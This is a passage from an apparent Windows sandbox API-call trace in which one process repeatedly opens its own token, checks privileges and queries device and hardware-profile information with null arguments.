(hProcess=0x0) returned 0x0 [0084.657] GetCurrentThread () returned 0xfffffffe [0084.657] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.657] GetLastError () returned 0x3f0 [0084.657] GetCurrentProcess () returned 0xffffffff [0084.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.658] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.658] SetLastError (dwErrCode=0x522) [0084.658] CloseHandle (hObject=0x114) returned 1 [0084.658] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.658] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.658] GetLastError () returned 0x578 [0084.658] SetLastError (dwErrCode=0x578) [0084.658] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.658] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.658] GetCurrentThread () returned 0xfffffffe [0084.658] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.658] GetLastError () returned 0x3f0 [0084.658] GetCurrentProcess () returned 0xffffffff [0084.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.658] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.658] SetLastError (dwErrCode=0x522) [0084.658] CloseHandle (hObject=0x114) returned 1 [0084.658] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.658] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.658] GetLastError () returned 0x578 [0084.658] SetLastError (dwErrCode=0x578) [0084.658] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.658] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.658] GetCurrentThread () returned 0xfffffffe [0084.658] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.658] GetLastError () returned 0x3f0 [0084.658] GetCurrentProcess () returned 0xffffffff [0084.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.659] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.659] SetLastError (dwErrCode=0x522) [0084.659] CloseHandle (hObject=0x114) returned 1 [0084.659] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.659] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.659] GetLastError () returned 0x578 [0084.659] SetLastError (dwErrCode=0x578) [0084.659] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.659] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.659] GetCurrentThread () returned 0xfffffffe [0084.659] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.659] GetLastError () returned 0x3f0 [0084.659] GetCurrentProcess () returned 0xffffffff [0084.659] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.659] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.659] SetLastError (dwErrCode=0x522) [0084.659] CloseHandle (hObject=0x114) returned 1 [0084.659] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.659] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.659] GetLastError () returned 0x578 [0084.659] SetLastError (dwErrCode=0x578) [0084.659] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.659] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.659] GetCurrentThread () returned 0xfffffffe [0084.659] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.659] GetLastError () returned 0x3f0 [0084.659] GetCurrentProcess () returned 0xffffffff [0084.659] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.659] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.659] SetLastError (dwErrCode=0x522) [0084.659] CloseHandle (hObject=0x114) returned 1 [0084.659] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.659] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.659] GetLastError () returned 0x578 [0084.659] SetLastError (dwErrCode=0x578) [0084.659] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.659] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.659] GetCurrentThread () returned 0xfffffffe [0084.659] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.660] GetLastError () returned 0x3f0 [0084.660] GetCurrentProcess () returned 0xffffffff [0084.660] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.660] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.660] SetLastError (dwErrCode=0x522) [0084.660] CloseHandle (hObject=0x114) returned 1 [0084.660] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.660] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.660] GetLastError () returned 0x578 [0084.660] SetLastError (dwErrCode=0x578) [0084.660] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.660] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.660] GetCurrentThread () returned 0xfffffffe [0084.660] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.660] GetLastError () returned 0x3f0 [0084.660] GetCurrentProcess () returned 0xffffffff [0084.660] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.660] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.660] SetLastError (dwErrCode=0x522) [0084.660] CloseHandle (hObject=0x114) returned 1 [0084.660] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.660] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.660] GetLastError () returned 0x578 [0084.660] SetLastError (dwErrCode=0x578) [0084.660] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.660] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.660] GetCurrentThread () returned 0xfffffffe [0084.660] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.660] GetLastError () returned 0x3f0 [0084.660] GetCurrentProcess () returned 0xffffffff [0084.660] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.660] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.660] SetLastError (dwErrCode=0x522) [0084.660] CloseHandle (hObject=0x114) returned 1 [0084.660] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.660] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.660] GetLastError () returned 0x578 [0084.660] SetLastError (dwErrCode=0x578) [0084.660] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.660] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.661] GetCurrentThread () returned 0xfffffffe [0084.661] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.661] GetLastError () returned 0x3f0 [0084.661] GetCurrentProcess () returned 0xffffffff [0084.661] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.661] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.661] SetLastError (dwErrCode=0x522) [0084.661] CloseHandle (hObject=0x114) returned 1 [0084.661] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.661] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.661] GetLastError () returned 0x578 [0084.661] SetLastError (dwErrCode=0x578) [0084.661] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.661] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.661] GetCurrentThread () returned 0xfffffffe [0084.661] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.661] GetLastError () returned 0x3f0 [0084.661] GetCurrentProcess () returned 0xffffffff [0084.661] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.661] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.661] SetLastError (dwErrCode=0x522) [0084.661] CloseHandle (hObject=0x114) returned 1 [0084.661] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.661] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.661] GetLastError () returned 0x578 [0084.661] SetLastError (dwErrCode=0x578) [0084.661] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.661] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.661] GetCurrentThread () returned 0xfffffffe [0084.661] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.661] GetLastError () returned 0x3f0 [0084.661] GetCurrentProcess () returned 0xffffffff [0084.661] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.661] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.661] SetLastError (dwErrCode=0x522) [0084.661] CloseHandle (hObject=0x114) returned 1 [0084.661] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.661] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.661] GetLastError () returned 0x578 [0084.661] SetLastError (dwErrCode=0x578) [0084.662] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.662] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.662] GetCurrentThread () returned 0xfffffffe [0084.662] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.662] GetLastError () returned 0x3f0 [0084.662] GetCurrentProcess () returned 0xffffffff [0084.662] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.662] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.662] SetLastError (dwErrCode=0x522) [0084.662] CloseHandle (hObject=0x114) returned 1 [0084.662] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.662] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.662] GetLastError () returned 0x578 [0084.662] SetLastError (dwErrCode=0x578) [0084.662] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.662] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.662] GetCurrentThread () returned 0xfffffffe [0084.662] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.662] GetLastError () returned 0x3f0 [0084.662] GetCurrentProcess () returned 0xffffffff [0084.662] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.662] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.662] SetLastError (dwErrCode=0x522) [0084.662] CloseHandle (hObject=0x114) returned 1 [0084.662] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.662] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.662] GetLastError () returned 0x578 [0084.662] SetLastError (dwErrCode=0x578) [0084.662] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.662] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.662] GetCurrentThread () returned 0xfffffffe [0084.662] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.662] GetLastError () returned 0x3f0 [0084.662] GetCurrentProcess () returned 0xffffffff [0084.662] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.662] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.662] SetLastError (dwErrCode=0x522) [0084.662] CloseHandle (hObject=0x114) returned 1 [0084.662] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.662] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.662] GetLastError () returned 0x578 [0084.663] SetLastError (dwErrCode=0x578) [0084.663] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.663] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.663] GetCurrentThread () returned 0xfffffffe [0084.663] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.663] GetLastError () returned 0x3f0 [0084.663] GetCurrentProcess () returned 0xffffffff [0084.663] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.663] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.663] SetLastError (dwErrCode=0x522) [0084.663] CloseHandle (hObject=0x114) returned 1 [0084.663] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.663] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.663] GetLastError () returned 0x578 [0084.663] SetLastError (dwErrCode=0x578) [0084.663] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.663] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.663] GetCurrentThread () returned 0xfffffffe [0084.663] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.663] GetLastError () returned 0x3f0 [0084.663] GetCurrentProcess () returned 0xffffffff [0084.663] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.663] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.663] SetLastError (dwErrCode=0x522) [0084.663] CloseHandle (hObject=0x114) returned 1 [0084.663] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.663] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.663] GetLastError () returned 0x578 [0084.663] SetLastError (dwErrCode=0x578) [0084.663] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.663] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.663] GetCurrentThread () returned 0xfffffffe [0084.663] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.663] GetLastError () returned 0x3f0 [0084.663] GetCurrentProcess () returned 0xffffffff [0084.663] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.663] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.663] SetLastError (dwErrCode=0x522) [0084.663] CloseHandle (hObject=0x114) returned 1 [0084.664] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.664] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.664] GetLastError () returned 0x578 [0084.664] SetLastError (dwErrCode=0x578) [0084.664] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.664] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.664] GetCurrentThread () returned 0xfffffffe [0084.664] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.664] GetLastError () returned 0x3f0 [0084.664] GetCurrentProcess () returned 0xffffffff [0084.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.664] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.664] SetLastError (dwErrCode=0x522) [0084.664] CloseHandle (hObject=0x114) returned 1 [0084.664] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.664] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.664] GetLastError () returned 0x578 [0084.664] SetLastError (dwErrCode=0x578) [0084.664] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.664] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.664] GetCurrentThread () returned 0xfffffffe [0084.664] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.664] GetLastError () returned 0x3f0 [0084.664] GetCurrentProcess () returned 0xffffffff [0084.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.664] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.664] SetLastError (dwErrCode=0x522) [0084.664] CloseHandle (hObject=0x114) returned 1 [0084.664] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.664] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.664] GetLastError () returned 0x578 [0084.664] SetLastError (dwErrCode=0x578) [0084.664] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.664] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.664] GetCurrentThread () returned 0xfffffffe [0084.664] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.664] GetLastError () returned 0x3f0 [0084.664] GetCurrentProcess () returned 0xffffffff [0084.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.664] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.664] SetLastError (dwErrCode=0x522) [0084.665] CloseHandle (hObject=0x114) returned 1 [0084.665] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.665] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.665] GetLastError () returned 0x578 [0084.665] SetLastError (dwErrCode=0x578) [0084.665] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.665] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.665] GetCurrentThread () returned 0xfffffffe [0084.665] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.665] GetLastError () returned 0x3f0 [0084.665] GetCurrentProcess () returned 0xffffffff [0084.665] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.665] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.665] SetLastError (dwErrCode=0x522) [0084.665] CloseHandle (hObject=0x114) returned 1 [0084.665] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.665] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.665] GetLastError () returned 0x578 [0084.665] SetLastError (dwErrCode=0x578) [0084.665] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.665] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.665] GetCurrentThread () returned 0xfffffffe [0084.665] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.665] GetLastError () returned 0x3f0 [0084.665] 